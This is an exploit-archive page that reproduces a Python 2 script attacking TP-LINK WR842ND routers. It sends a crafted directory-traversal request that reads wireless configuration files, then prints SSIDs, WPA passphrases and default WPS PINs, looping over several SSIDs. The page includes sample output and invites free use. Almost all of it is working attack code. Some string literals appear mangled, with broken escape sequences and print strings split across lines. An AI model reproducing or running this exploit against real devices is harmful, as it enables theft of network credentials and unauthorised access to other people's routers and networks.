Home / exploitsPDF  

TP-LINK WR842ND Directory Traversal

Posted on 31 May 2013

#!/usr/bin/python

'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com

If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.

Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n

Feel free to use, modify and distribute.

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com

:: Crafting and sending evil request..

-> ssid="some_network"
 !wps_default_pin=01010101
 !wpa_passphrase="secretpsk"

:: Search for another networks? (y/n)
> y

:: Searching..

:: Jumping for SSID 1..

-> ssid="another_network"
 !wps_default_pin=01010101
 !wpa_passphrase="another_secretpsk"

:: Jumping for SSID 2..

:: Jumping for SSID 3..

:: Jumping for SSID 4..

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->

'''

import requests,sys,socket
from time import sleep

data=''
data2=''
url=''

W = '33[0m'
R = '33[31m'
B = '33[34m'

#KISS
def parse_data(text):
 words = text.split()

 for word in words :
 if 'ssid' in word and 'ignore' not in word :
 print W+"-> "+B+"%s" %(word)
 if 'pass' in word :
 print W+" !"+R+"%s" %(word)
 if 'default_pin' in word :
 print W+" !"+R+"%s" %(word)
 print W

def make_url(host,n):
 junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
 return junk

if len(sys.argv) == 1 :
 print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
 sys.exit()

url = make_url(sys.argv[1],0)

if ':' in sys.argv[1] :
 host = sys.argv[1].split(":")
else :
 host = sys.argv[1]

headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}

print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com
"

try:
 print R+":: Crafting and sending evil request.."
 print W
 data = requests.get(url,headers=headers).content

except requests.ConnectionError, e:
 print R+":! Connection error!
"
 sys.exit()

if data :
 parse_data(data)
else :
 print B+":! Ups.. seems to be not vulnerable"
 print W

print "
:: Search for another networks? (y/n)"
answer = raw_input("> ")

if answer=="y" or answer=="Y" :
 print R+"
:: Searching.."
 print W

 for i in range(1,5) :

 print W+":: Jumping for SSID %s..
" %(i)

 sleep(3)

 url = make_url(sys.argv[1],i)
 data2 = requests.get(url,headers=headers).content

 if data2 :
 parse_data(data2)
 else :
 print B+"-> Nothing..
"

else :
 print W+"
:: Bye!"

print

 

TOP

Malware :

Exploits :